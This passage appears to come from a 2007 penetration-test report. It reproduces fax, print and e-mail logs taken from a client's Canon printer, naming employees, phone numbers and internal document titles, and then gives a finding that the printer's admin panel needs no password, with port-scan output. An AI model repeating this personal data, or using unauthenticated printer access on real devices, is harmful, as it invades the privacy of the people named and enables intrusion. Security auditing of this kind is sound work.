Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro (Rif. n. lavoro)","Risultato","Tipo lavoro","Utente","Destinazione","Subindirizzo","Modo","Ora
inizio","Ora fine","Codice fine"
5082,"OK","Fax","","+39 0105794202","","ECM",12/07 2007 12:16:21,12/07 2007 12:16:51,"OK"
5081,"OK","Fax","","00390280235200","","ECM",11/07 2007 13:08:00,11/07 2007 13:08:19,"OK"
5080,"OK","Fax","","Sconosciuto","","ECM",11/07 2007 12:22:55,11/07 2007 12:23:44,"OK"
5079,"OK","Fax","","++39 0288107507","","ECM",10/07 2007 17:41:21,10/07 2007 17:41:50,"OK"
5078,"OK","Fax","","+39 02 30323228","","ECM",10/07 2007 16:15:43,10/07 2007 16:16:07,"OK"
5077,"OK","Fax","","++39 0288107507","","ECM",10/07 2007 13:14:28,10/07 2007 13:15:16,"OK"
5076,"OK","Fax","","+39 02 3390651","","ECM",09/07 2007 11:44:55,09/07 2007 11:45:26,"OK"
5075,"OK","Fax","","00390642120200","","ECM",09/07 2007 10:02:51,09/07 2007 10:03:30,"OK"
5074,"NG","Fax","","Sconosciuto",""," ",09/07 2007 09:58:21,09/07 2007 09:59:06,"#005"
5073,"OK","Fax","","00218213337771","","G3",07/07 2007 19:43:57,07/07 2007 19:47:02,"OK"
5072,"OK","Fax","","028372544","","ECM",05/07 2007 14:49:26,05/07 2007 14:49:48,"OK"
5071,"OK","Fax","","0808915140","","ECM",03/07 2007 11:14:44,03/07 2007 11:15:38,"OK"
5070,"OK","Fax","","Sconosciuto","","ECM",29/06 2007 13:37:15,29/06 2007 13:37:49,"OK"
5069,"OK","Fax","","0434 24 30 33 ","","ECM",29/06 2007 11:36:10,29/06 2007 11:37:32,"OK"
5068,"OK","Fax","","0039 541 28794","","ECM",28/06 2007 15:35:41,28/06 2007 15:36:47,"OK"
5067,"OK","Fax","","0221722310","","ECM",22/06 2007 12:53:42,22/06 2007 12:54:27,"OK"
5066,"OK","Fax","","0234531194","","ECM",19/06 2007 11:26:54,19/06 2007 11:27:19,"OK"
5065,"OK","Fax","","0248517364","","ECM",18/06 2007 10:14:20,18/06 2007 10:15:01,"OK"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 334 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5064,"OK","Fax","","Sconosciuto","","ECM",15/06 2007 16:15:24,15/06 2007 16:16:05,"OK"
5063,"OK","Fax","","0039 541 28794","","ECM",15/06 2007 09:49:46,15/06 2007 09:50:53,"OK"
5062,"OK","Fax","","02074009771","","ECM",14/06 2007 15:49:57,14/06 2007 15:50:26,"OK"
5061,"OK","Fax","","02074009771","","ECM",13/06 2007 19:01:25,13/06 2007 19:01:57,"OK"
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 02:48:41 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro","Risultato","Nome documento","Utente","ID divisione","Ora inizio","Ora fine","Pagine
originale","Pagine da stampare","Fogli x copie","Nota lavoro","Dettagli","Codice fine"
6956,"OK","Microsoft PowerPoint - MTS Group","PSanta",,13/07 2007 19:28:56,13/07 2007 19:29:47,"32","32","32 X
6955,"OK","Split Fill_20070713_175710.txt","LPelizzola",,13/07 2007 17:58:25,13/07 2007 17:58:37,"1","1","1 X
6954,"OK","Microsoft PowerPoint - MTS Group","PCambieri",,13/07 2007 17:45:55,13/07 2007
6953,"OK","Bloomberg Screen #22","bloomberg",,13/07 2007 17:25:51,13/07 2007 17:26:03,"1","1","1 X
6952,"OK","Microsoft PowerPoint - MTS Group","ASantangelo",,13/07 2007 17:16:28,13/07 2007
6951,"OK","Microsoft PowerPoint - MTS Group","MNovik",,13/07 2007 16:56:55,13/07 2007 16:57:52,"32","32","16 X
6950,"OK","Microsoft PowerPoint - MTS Group","MNapoletano",,13/07 2007 16:45:47,13/07 2007 6949,"OK","Bloomberg
Screen #21","bloomberg",,13/07 2007 16:22:33,13/07 2007 16:22:42,"1","1","1 X 6948,"OK","Bloomberg Screen
#20","bloomberg",,13/07 2007 16:21:44,13/07 2007 16:21:54,"1","1","1 X 6947,"OK","Bloomberg Screen
#19","bloomberg",,13/07 2007 16:20:22,13/07 2007 16:20:32,"1","1","1 X 6946,"OK","Bloomberg Screen
#18","bloomberg",,13/07 2007 16:19:36,13/07 2007 16:19:46,"1","1","1 X 6945,"OK","Bloomberg Screen
#17","bloomberg",,13/07 2007 16:18:54,13/07 2007 16:19:03,"1","1","1 X 6944,"OK","Bloomberg Screen
#16","bloomberg",,13/07 2007 16:18:13,13/07 2007 16:18:23,"1","1","1 X 6943,"OK","Bloomberg Screen
#15","bloomberg",,13/07 2007 16:17:15,13/07 2007 16:17:25,"1","1","1 X 6942,"OK","Bloomberg Screen
#14","bloomberg",,13/07 2007 16:16:16,13/07 2007 16:16:26,"1","1","1 X 6941,"OK","Bloomberg Screen
#13","bloomberg",,13/07 2007 16:15:19,13/07 2007 16:15:29,"1","1","1 X 6940,"OK","Bloomberg Screen
#12","bloomberg",,13/07 2007 16:14:14,13/07 2007 16:14:24,"1","1","1 X 6939,"OK","Bloomberg Screen
#11","bloomberg",,13/07 2007 16:13:36,13/07 2007 16:13:47,"1","1","1 X 6938,"OK","Bloomberg Screen
#10","bloomberg",,13/07 2007 16:12:46,13/07 2007 16:12:56,"1","1","1 X 6937,"OK","Bloomberg Screen
#9","bloomberg",,13/07 2007 16:11:40,13/07 2007 16:11:51,"1","1","1 X 6936,"OK","Bloomberg Screen
#8","bloomberg",,13/07 2007 16:08:24,13/07 2007 16:08:34,"1","1","1 X 6935,"OK","Bloomberg Screen
#7","bloomberg",,13/07 2007 16:07:25,13/07 2007 16:07:36,"1","1","1 X 6934,"OK","Bloomberg Screen
#6","bloomberg",,13/07 2007 16:04:50,13/07 2007 16:05:01,"1","1","1 X 6933,"OK","Bloomberg Screen
#5","bloomberg",,13/07 2007 15:59:14,13/07 2007 15:59:24,"1","1","1 X 6932,"OK","Bloomberg Screen
#4","bloomberg",,13/07 2007 15:58:31,13/07 2007 15:58:41,"1","1","1 X 6931,"OK","Bloomberg Screen
#3","bloomberg",,13/07 2007 15:57:29,13/07 2007 15:57:40,"1","1","1 X 6930,"OK","Bloomberg Screen
#2","bloomberg",,13/07 2007 15:49:24,13/07 2007 15:49:35,"1","1","1 X 6929,"OK","Bloomberg Screen
#1","bloomberg",,13/07 2007 15:45:39,13/07 2007 15:45:49,"1","1","1 X 6928,"OK","Minacce Informatiche dalla a
all","CMalerba",,13/07 2007 15:39:14,13/07 2007 15:40:43,"28","28","14
6927,"OK","http://orario.trenitalia.com/b2c","CMalerba",,13/07 2007 15:38:22,13/07 2007 15:38:33,"1","1","1 X
6926,"OK","Microsoft Word - Impact Analysis","MSavoia",,13/07 2007 15:28:12,13/07 2007 15:28:47,"17","17","9 X
6925,"OK","http://orario.trenitalia.com/b2c","SMarchetti",,13/07 2007 15:24:44,13/07 2007 15:24:56,"2","2","1
6924,"OK","http://orario.trenitalia.com/b2c","SMarchetti",,13/07 2007 15:24:16,13/07 2007 15:24:29,"2","2","1
6923,"OK","http://orario.trenitalia.com/b2c","SMarchetti",,13/07 2007 15:22:44,13/07 2007 15:22:57,"2","2","1
6922,"OK","Microsoft Word - Modello Modulo ","MNapoletano",,13/07 2007 15:15:09,13/07 2007 6921,"OK","Microsoft
Word - FaxAmministrato","SMarchetti",,13/07 2007 11:32:47,13/07 2007 11:33:00,"1","1","1 6920,"OK","Microsoft Word
- FaxAmministrato","SMarchetti",,13/07 2007 11:31:55,13/07 2007 11:32:08,"1","1","1 6919,"OK","Microsoft Word -
FaxAmministrato","SMarchetti",,13/07 2007 11:31:45,13/07 2007 11:31:56,"1","1","1 6918,"OK","Microsoft Word -
FaxAmministrato","SMarchetti",,13/07 2007 11:31:16,13/07 2007 11:31:28,"1","1","1 6917,"OK","Microsoft Word -
FaxAmministrato","SMarchetti",,13/07 2007 11:30:42,13/07 2007 11:30:57,"1","1","1 6916,"OK","Microsoft Word -
BV_New Bond Typ","HMaatugh",,13/07 2007 09:05:45,13/07 2007 09:06:10,"7","7","4 X 6915,"OK","Impact Analysis CR
15895 - In...","SMarchetti",,12/07 2007 18:14:10,12/07 2007
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 335 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6914,"OK","Item 2 - Minutes MB 28 June 2006","CMalerba",,12/07 2007 17:48:44,12/07 2007 17:49:12,"11","11","6
6913,"OK","Microsoft Word - Etichetta.doc","CMalerba",,12/07 2007 17:22:23,12/07 2007 17:26:19,"1","1","1 X
6912,"OK","Item 4 - MTS_Executive Summary_I","CMalerba",,12/07 2007 16:13:55,12/07 2007 16:15:23,"57","57","29
6911,"OK","Priorities final.xls","LPelizzola",,12/07 2007 16:09:31,12/07 2007 16:09:48,"3","3","3 X
6910,"OK","http://derivserv.dtcc.com/binary","ABernazzoli",,12/07 2007 16:02:24,12/07 2007 6909,"OK","Crystal
Reports - Stampa Fiscale","Sfinge",,12/07 2007 15:53:04,12/07 2007 15:58:39,"41","41","41 X 1","","","OK"
6908,"OK","Item 4 - MTS_Executive Summary_I","CMalerba",,12/07 2007 15:42:55,12/07 2007 6907,"OK","outbind://145-
000000000257DD2D8C","SMarchetti",,12/07 2007 15:37:40,12/07 2007 15:37:55,"2","2","1 6906,"OK","Priorities
final.xls","FCazzulini",,12/07 2007 15:26:45,12/07 2007 15:26:51,"1","1","1 X 6905,"OK","Priorities
final.xls","FCazzulini",,12/07 2007 15:26:42,12/07 2007 15:26:48,"1","1","1 X 6904,"OK","Priorities
final.xls","FCazzulini",,12/07 2007 15:26:38,12/07 2007 15:26:46,"1","1","1 X 6903,"OK","Microsoft Word -
Architettura MT","FCazzulini",,12/07 2007 15:24:27,12/07 2007 6902,"OK","Item 7.a)
Docestrateg_projects.p","CMalerba",,12/07 2007 15:14:23,12/07 2007 15:15:03,"2","20","2 X 10","","","OK"
6901,"OK","Priorities final.xls","LPelizzola",,12/07 2007 13:42:15,12/07 2007 13:42:25,"1","1","1 X
6900,"OK","Priorities final.xls","LPelizzola",,12/07 2007 13:41:08,12/07 2007 13:41:18,"1","1","1 X
6899,"OK","Priorities final.xls","LPelizzola",,12/07 2007 13:40:50,12/07 2007 13:41:00,"1","1","1 X
6898,"OK","Priorities final.xls","LPelizzola",,12/07 2007 13:40:25,12/07 2007 13:40:36,"1","1","1 X
6897,"OK","Item 5 - Sub Delega ai Responsab","CMalerba",,12/07 2007 13:15:23,12/07 2007 13:27:12,"2","20","2 X
6896,"OK","Item 5 - Powers Delegated by the","CMalerba",,12/07 2007 13:15:02,12/07 2007 13:26:28,"2","20","2 X
6895,"OK","Item 5 - Delegation of powers.pd","CMalerba",,12/07 2007 13:14:43,12/07 2007 13:25:57,"1","10","1 X
6894,"OK","Item 4 - Presentation IT audit 2","CMalerba",,12/07 2007 13:14:17,12/07 2007 6893,"OK","Item 4 - MTS
Executive Summary20","CMalerba",,12/07 2007 13:13:13,12/07 2007 13:21:55,"63","378","32 X 6","","","OK"
6892,"OK","Microsoft Word - Impact Analysis","SMarchetti",,12/07 2007 12:53:43,12/07 2007
6891,"OK","http://www.sophos.com/sophos/doc","DMasella",,12/07 2007 12:37:55,12/07 2007 12:39:15,"28","28","14
6890,"NG","Item 4 - MTS Executive Summary20","CMalerba",,12/07 2007 12:10:54,12/07 2007 12:21:08,"63","256","2
6889,"OK","Item 2 - Minutes MB 28 June 2007","CMalerba",,12/07 2007 12:10:26,12/07 2007 6888,"OK","Item 2 -
Minutes MB 28 June 2006","CMalerba",,12/07 2007 12:10:11,12/07 2007 12:12:49,"11","110","11 X 10","","","OK"
6887,"OK","MTS - Notice_of_call_Management_","CMalerba",,12/07 2007 11:59:18,12/07 2007 11:59:56,"2","20","1 X
6886,"OK","Item 4 - MTS Group New Organisat","CMalerba",,12/07 2007 11:45:22,12/07 2007 11:45:33,"1","1","1 X
6885,"OK","Microsoft Word - Document1","MNapoletano",,12/07 2007 10:31:54,12/07 2007 10:32:22,"11","11","6 X
6884,"OK","Presenze Bizzoca.xls","CMalerba",,12/07 2007 10:23:39,12/07 2007 10:23:49,"1","1","1 X
6883,"OK","http://www.microsoft.com/technet","MNapoletano",,12/07 2007 10:11:06,12/07 2007
6882,"OK","outbind://20-00000000BF52D9C5389","CMalerba",,12/07 2007 10:00:02,12/07 2007 10:00:13,"1","1","1 X
6881,"OK","Microsoft PowerPoint - MTS Group","FCazzulini",,11/07 2007 18:01:27,11/07 2007 18:01:49,"6","6","6
6880,"OK","Microsoft PowerPoint - MTS Group","FCazzulini",,11/07 2007 18:01:24,11/07 2007 18:01:41,"6","6","6
6879,"OK","RC RISCHI DIVERSI 0680 12-2004.p","MSavoia",,11/07 2007 17:15:15,11/07 2007 17:17:00,"24","24","12
6878,"OK","ZURICH QUESTIONARIO AD. PERS. FI","MSavoia",,11/07 2007 17:14:02,11/07 2007 17:14:28,"3","3","2 X
6877,"OK","Microsoft Word - Dichiarazione a","MSavoia",,11/07 2007 17:11:31,11/07 2007 17:11:45,"1","1","1 X
6876,"OK","Microsoft Word - Dichiarazione a","MSavoia",,11/07 2007 17:10:20,11/07 2007 17:10:32,"1","1","1 X
6875,"OK","Microsoft Word - Informativa pri","MSavoia",,11/07 2007 17:09:41,11/07 2007 17:09:55,"2","2","1 X
6874,"OK","Microsoft Word - GAP july 2007 1","ABernazzoli",,11/07 2007 16:02:45,11/07 2007 16:02:56,"1","1","1
6873,"NG","http://technet2.microsoft.com/Wi","MBiazzo",,11/07 2007 14:18:56,11/07 2007 14:19:48,"41","28","14
6872,"OK","Master Plan 19_06_07 ","SMarchetti",,11/07 2007 13:38:24,11/07 2007 13:38:45,"2","2","1 X
6871,"OK","Master Plan 19_06_07 ","ABernazzoli",,11/07 2007 13:38:21,11/07 2007 13:38:37,"4","3","3
6870,"OK","Using Administrative Template Fi","lmeneghesso",,11/07 2007 11:49:50,11/07 2007
6869,"OK","http://www.sophos.it/sophos/docs","DMasella",,11/07 2007 11:00:38,11/07 2007 11:02:05,"28","28","14
6868,"OK","MTS Internet Access - Whitepaper","FCazzulini",,10/07 2007 20:46:51,10/07 2007 20:47:16,"4","4","2
6867,"OK","http://www.eurexchange.com/downl","FCazzulini",,10/07 2007 19:30:44,10/07 2007 19:31:10,"9","9","5
6866,"OK","CommonFrontEndTechnicalOverview.","lmeneghesso",,10/07 2007 19:09:05,10/07 2007 6865,"OK","Bloomberg
Screen #9","bloomberg",,10/07 2007 19:01:29,10/07 2007 19:01:39,"1","1","1 X 6864,"OK","Bloomberg Screen
#8","bloomberg",,10/07 2007 18:48:08,10/07 2007 18:48:18,"1","1","1 X 6863,"OK","Bar - Management
board.xls","CMalerba",,10/07 2007 16:50:47,10/07 2007 16:50:58,"1","1","1 X 6862,"OK","Microsoft Word - Impact
Analysis","FCazzulini",,10/07 2007 14:52:35,10/07 2007 14:53:01,"9","9","5 6861,"OK","Microsoft PowerPoint - 07 06
15_","FCazzulini",,10/07 2007 14:46:54,10/07 2007 14:47:13,"8","8","8 6860,"OK","07 05 02_SIA
status_internal.xls","FCazzulini",,10/07 2007 14:46:43,10/07 2007 14:46:51,"1","1","1
6859,"OK","outbind://127/","FCazzulini",,10/07 2007 14:46:29,10/07 2007 14:46:42,"2","2","2 X 1","","","OK"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 336 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6858,"OK","Microsoft Word - Document1","MNapoletano",,10/07 2007 13:07:23,10/07 2007 13:07:56,"15","15","8 X
6857,"OK","Windows Firewall GPO.pdf","lmeneghesso",,10/07 2007 12:23:58,10/07 2007 12:24:24,"2","2","1 X
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 02:48:47 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro (Rif. n. lavoro)","Risultato","Tipo lavoro","Destinazione","Utente","ID divisione","Modo","Ora
inizio","Ora fine","Invio pagine","Dimensione file da inviare (K Byte)","Nome documento da inviare","Codice fine"
429,"--","E-mail","Carlo Malerba","",,"",13/07 2007 16:39:22,13/07 2007 16:39:26,2,414,"","#899"
428,"OK","Fax","00287937118","",,"ECM",13/07 2007 15:21:12,13/07 2007 15:25:12,3,0,"","OK"
427,"OK","Fax","00248020298","",,"G3",13/07 2007 14:52:07,13/07 2007 15:01:08,6,0,"","OK"
427,"NG","Fax","00248020298","",,"G3",13/07 2007 14:47:31,13/07 2007 14:49:32,1,0,"",""
426,"OK","Fax","00677726527","",,"ECM",13/07 2007 14:40:44,13/07 2007 14:41:34,1,0,"","OK"
425,"NG","Fax","00677726527","",," ",13/07 2007 12:31:23,13/07 2007 12:32:20,0,0,"","#018"
424,"NG","Fax","008119362144","",," ",13/07 2007 12:30:07,13/07 2007 12:31:04,0,0,"","#018"
423,"OK","Fax","00226884430","",,"ECM",13/07 2007 12:20:35,13/07 2007 12:21:33,1,0,"","OK"
422,"OK","Fax","00171449344","",,"ECM",13/07 2007 12:18:54,13/07 2007 12:20:17,1,0,"","OK"
421,"NG","Fax","00773690294","",," ",13/07 2007 12:19:42,13/07 2007 12:19:42,0,0,"","#995"
420,"OK","Fax","00267074101","",,"G3",13/07 2007 12:12:01,13/07 2007 12:17:21,1,0,"","OK"
419,"OK","Fax","00295330726","",,"ECM",13/07 2007 12:08:52,13/07 2007 12:11:42,1,0,"","OK"
417,"OK","Fax","00557953184","",,"ECM",13/07 2007 12:06:57,13/07 2007 12:08:33,1,0,"","OK"
418,"OK","Fax","00823502079","",,"ECM",13/07 2007 12:04:36,13/07 2007 12:06:38,1,0,"","OK"
414,"NG","Fax","00677726527","",," ",13/07 2007 12:03:21,13/07 2007 12:04:17,0,0,"","#018"
416,"OK","Fax","00864210827","",,"ECM",13/07 2007 11:59:51,13/07 2007 12:01:47,1,0,"","OK"
415,"OK","Fax","00270039910","",,"ECM",13/07 2007 11:57:16,13/07 2007 11:58:18,1,0,"","OK"
413,"OK","Fax","00647839257","",,"ECM",13/07 2007 11:55:15,13/07 2007 11:56:57,1,0,"","OK"
412,"OK","Fax","00313301837","",,"ECM",13/07 2007 11:50:59,13/07 2007 11:54:56,1,0,"","OK"
411,"OK","Fax","0050970654","",,"G3",13/07 2007 11:47:21,13/07 2007 11:49:26,2,0,"","OK"
408,"NG","Fax","008119362144","",," ",13/07 2007 11:46:12,13/07 2007 11:47:03,0,0,"",""
412,"NG","Fax","00313301837","",,"ECM",13/07 2007 11:41:10,13/07 2007 11:44:38,1,0,"",""
410,"OK","Fax","00697656464","",,"G3",13/07 2007 11:34:19,13/07 2007 11:38:20,2,0,"","OK"
409,"OK","Fax","00685301174","",,"ECM",13/07 2007 11:33:01,13/07 2007 11:34:01,1,0,"","OK"
407,"OK","Fax","00742320301","",,"ECM",13/07 2007 11:27:31,13/07 2007 11:31:27,2,0,"","OK"
406,"OK","Fax","00270059854","",,"ECM",13/07 2007 11:19:06,13/07 2007 11:21:10,2,0,"","OK"
405,"--","E-mail","Carlo Malerba","",,"",12/07 2007 16:07:07,12/07 2007 16:08:59,41,7531,"","#899"
404,"OK","Fax","00038521222519","",,"ECM",11/07 2007 15:35:38,11/07 2007 15:40:20,1,0,"","OK"
403,"OK","Fax","00302002765","",,"G3",11/07 2007 12:36:08,11/07 2007 12:37:28,1,0,"","OK"
402,"NG","Fax","00735583510","",," ",11/07 2007 11:28:07,11/07 2007 11:29:04,0,0,"","#018"
401,"NG","Fax","0024043326","",," ",11/07 2007 10:55:07,11/07 2007 10:56:03,0,0,"","#018"
400,"NG","Fax","0024043326","",," ",11/07 2007 10:44:07,11/07 2007 10:45:04,0,0,"","#018"
400,"NG","Fax","0024043326","",,"ECM",11/07 2007 10:33:06,11/07 2007 10:41:19,1,0,"",""
399,"OK","Fax","00287937118","",,"ECM",10/07 2007 13:12:12,10/07 2007 13:14:18,2,0,"","OK"
398,"OK","Fax","00362367026","",,"ECM",09/07 2007 17:32:56,09/07 2007 17:36:54,3,0,"","OK"
397,"OK","Fax","00038521222519","",,"ECM",09/07 2007 09:53:19,09/07 2007 09:55:43,1,0,"","OK"
396,"OK","Fax","0800900150","",,"ECM",06/07 2007 11:45:41,06/07 2007 11:47:00,1,0,"","OK"
395,"--","E-mail","Carlo Malerba","",,"",05/07 2007 12:11:35,05/07 2007 12:11:37,1,318,"","#899"
394,"OK","Fax","00221722233","",,"ECM",05/07 2007 11:14:01,05/07 2007 11:14:48,1,0,"","OK"
393,"OK","Fax","00280688287","",,"ECM",05/07 2007 09:51:03,05/07 2007 09:54:39,2,0,"","OK"
392,"OK","Fax","00229406965","",,"ECM",04/07 2007 15:53:41,04/07 2007 15:54:25,2,0,"","OK"
391,"--","E-mail","Andrea Battaglia","",,"",04/07 2007 13:37:16,04/07 2007 13:37:27,6,1203,"","#899"
390,"OK","Fax","0800910028","",,"ECM",03/07 2007 17:32:08,03/07 2007 17:32:30,1,0,"","OK"
389,"OK","Fax","00642120200","",,"ECM",03/07 2007 16:26:14,03/07 2007 16:27:18,1,0,"","OK"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 337 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
388,"OK","Fax","0800654415","",,"G3",03/07 2007 10:58:59,03/07 2007 11:00:37,2,0,"","OK"
387,"OK","Fax","00233000083","",,"ECM",02/07 2007 17:39:39,02/07 2007 17:41:03,2,0,"","OK"
386,"--","E-mail","[email protected]","",,"",02/07 2007 11:29:31,02/07 2007 11:29:34,1,196,"","#899"
385,"OK","Fax","00277005365","",,"ECM",29/06 2007 11:42:52,29/06 2007 11:45:15,8,0,"","OK"
384,"OK","Fax","00280235200","",,"ECM",28/06 2007 16:06:34,28/06 2007 16:08:17,2,0,"","OK"
383,"--","E-mail","Carlo Malerba","",,"",28/06 2007 11:25:01,28/06 2007 11:25:03,1,271,"","#899"
382,"OK","Fax","002781896","",,"ECM",27/06 2007 10:47:04,27/06 2007 10:47:48,3,0,"","OK"
381,"OK","Fax","00642120200","",,"ECM",26/06 2007 16:03:29,26/06 2007 16:05:28,2,0,"","OK"
380,"--","E-mail","Andrea Battaglia","",,"",26/06 2007 15:06:29,26/06 2007 15:06:33,2,541,"","#899"
379,"--","E-mail","Andrea Battaglia","",,"",26/06 2007 15:05:47,26/06 2007 15:05:49,1,85,"","#899"
378,"OK","Fax","00229515384","",,"G3",21/06 2007 16:54:49,21/06 2007 16:59:06,3,0,"","OK"
377,"OK","Fax","00223995195","",,"ECM",21/06 2007 16:09:50,21/06 2007 16:11:21,3,0,"","OK"
376,"NG","Fax","00223995195","",," ",21/06 2007 15:57:07,21/06 2007 15:58:04,0,0,"","#018"
375,"--","E-mail","Andrea Battaglia","",,"",21/06 2007 15:24:30,21/06 2007 15:24:32,1,295,"","#899"
374,"OK","Fax","00317379377","",,"ECM",21/06 2007 14:52:39,21/06 2007 14:53:28,2,0,"","OK"
373,"--","E-mail","Luca Meneghesso","",,"",21/06 2007 11:37:03,21/06 2007 11:37:10,4,519,"","#899"
372,"OK","Fax","00264152432","",,"ECM",20/06 2007 17:37:23,20/06 2007 17:38:23,2,0,"","OK"
371,"OK","Fax","InfoKlix - Milena","",,"ECM",20/06 2007 17:35:50,20/06 2007 17:37:05,3,0,"","OK"
370,"OK","Fax","00221722302","",,"ECM",20/06 2007 17:30:03,20/06 2007 17:31:30,4,0,"","OK"
369,"--","E-mail","Fabrizio Cazzulini","",,"",20/06 2007 16:01:24,20/06 2007 16:01:49,12,1784,"","#899"
368,"--","E-mail","Domenico Masella","",,"",20/06 2007 16:00:43,20/06 2007 16:01:09,12,1787,"","#899"
367,"OK","Fax","00273954740","",,"ECM",19/06 2007 14:58:36,19/06 2007 14:59:48,2,0,"","OK"
366,"--","E-mail","Andrea Battaglia","",,"",19/06 2007 13:23:00,19/06 2007 13:23:02,1,403,"","#899"
365,"OK","Fax","00642120200","",,"ECM",18/06 2007 15:12:21,18/06 2007 15:13:19,1,0,"","OK"
364,"--","E-mail","Andrea Battaglia","",,"",18/06 2007 12:51:22,18/06 2007 12:51:26,1,191,"","#899"
363,"--","E-mail","Andrea Battaglia","",,"",18/06 2007 12:51:02,18/06 2007 12:51:09,1,3092,"","#899"
362,"--","E-mail","Andrea Battaglia","",,"",18/06 2007 12:50:32,18/06 2007 12:50:36,1,1348,"","#899"
361,"OK","Fax","000496995664365","",,"ECM",15/06 2007 12:21:51,15/06 2007 12:22:27,1,0,"","OK"
360,"OK","Fax","00642120200","",,"ECM",14/06 2007 11:24:07,14/06 2007 11:25:28,1,0,"","OK"
359,"NG","Fax","00642120200","",," ",14/06 2007 11:20:10,14/06 2007 11:20:10,0,0,"","#995"
359,"NG","Fax","00642120200","",,"ECM",14/06 2007 11:14:07,14/06 2007 11:15:52,1,0,"",""
358,"OK","Fax","00248012728","",,"ECM",13/06 2007 17:00:41,13/06 2007 17:10:35,10,0,"","OK"
357,"--","E-mail","Marco Villa","",,"",13/06 2007 11:16:09,13/06 2007 11:18:01,1,120,"","#899"
356,"--","E-mail","Marco Villa","",,"",12/06 2007 14:47:00,12/06 2007 14:47:05,2,290,"","#899"
6.18.14 100.100.200.252 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V7
Risk state: high
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; check the printer authorization system to prevent information
disclosure of sensitive data like the last fax sents, senders data, phone numbers, etc.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Canon Version IR3045 - Canon Network Multi-
PDL Printer Board-D1/H1
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 338 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname IR3045
Compromised Compromised Directly Info Admin with no password
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open ftp?
80/tcp open ipp Canon printer web interface 2.21
515/tcp open printer
631/tcp open ipp?
8000/tcp open http-alt?
9100/tcp open jetdirect?
Uptime: 15.346 days (since Fri Jun 29 02:01:30 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
It's possible to get admin access without specifying any password, this might lead to DoS and
Information Disclosure.
The administration panel has privacy and data leak issues that can be used in social engineering
attacks:
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 23:00:48 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro (Rif. n. lavoro)","Risultato","Utente","ID divisione","Modo","Ora inizio","Tempo di
utilizzo","Destinazione","Originali","Pagine originale","Invio pagine","Codice fine"
5,"NG","lmeneghesso",,"Invio",29/03 2007 16:33:25,0'00,"00280235200","-","-","0","STOP"
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 23:00:44 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro","Risultato","Nome documento","Utente","ID divisione","Ora inizio","Ora fine","Pagine
originale","Pagine da stampare","Fogli x copie","Nota lavoro","Dettagli","Codice fine"
5307,"OK","730-4 MTS.pdf","BSimpkins",,13/07 2007 10:16:08,13/07 2007 10:16:35,"6","6","6 X 1","","","OK"
5306,"OK","Microsoft Word - Item 7 - EuroMT","CMalerba",,13/07 2007 08:59:28,13/07 2007 09:19:51,"2","16","2 X
5305,"OK","Microsoft Word - Item 6 - EuroMT","CMalerba",,13/07 2007 08:59:20,13/07 2007 09:19:29,"2","16","2 X
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 339 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5304,"OK","Item 3 288a - LN.pdf","CMalerba",,13/07 2007 08:59:11,13/07 2007 09:19:08,"2","16","2 X 5303,"OK","Item
2(d) 288a - PP.pdf","CMalerba",,13/07 2007 08:58:58,13/07 2007 09:17:09,"2","16","2 X 5302,"OK","Item 2(c) 288a -
GA.pdf","CMalerba",,13/07 2007 08:58:47,13/07 2007 09:16:48,"2","16","2 X 5301,"OK","Item 2(a) 288a -
CP.pdf","CMalerba",,13/07 2007 08:58:35,13/07 2007 09:16:27,"2","16","2 X 5300,"OK","Item 2 (b) 288a -
CSB.pdf","CMalerba",,13/07 2007 08:58:21,13/07 2007 09:16:05,"2","16","2 X 5299,"OK","Microsoft Word - Compliance
Item","CMalerba",,13/07 2007 08:58:04,13/07 2007 09:15:38,"1","8","1 X 5298,"OK","3.
EUREX_Nominated_Person_Declar","CMalerba",,13/07 2007 08:57:53,13/07 2007 09:15:27,"1","8","1 X 5297,"OK","3.
